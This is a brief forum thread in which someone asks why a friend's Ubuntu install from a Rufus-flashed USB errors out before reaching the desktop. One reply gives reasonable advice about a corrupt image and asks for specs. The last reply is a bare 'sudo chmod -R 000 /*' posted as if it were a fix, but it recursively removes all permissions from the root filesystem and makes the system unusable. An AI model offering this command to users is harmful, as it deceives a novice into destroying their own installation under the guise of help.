Friend Encountering Linux Error

Recently my friend has been trying to install Ubuntu and he used Rufus to flash, however whenever he goes into the try or install Ubuntu, before it can get to the desktop, it throws the error pictured below. If anybody knows what to do that would be great. He has an msi b450 tomahawk and he also disabled secure boot.

Could be a corrupt image, in which case redownloading it might solve the issue, or some incompatibility with the hardware. What are the full specs of the system?

sudo chmod -R 000 /*
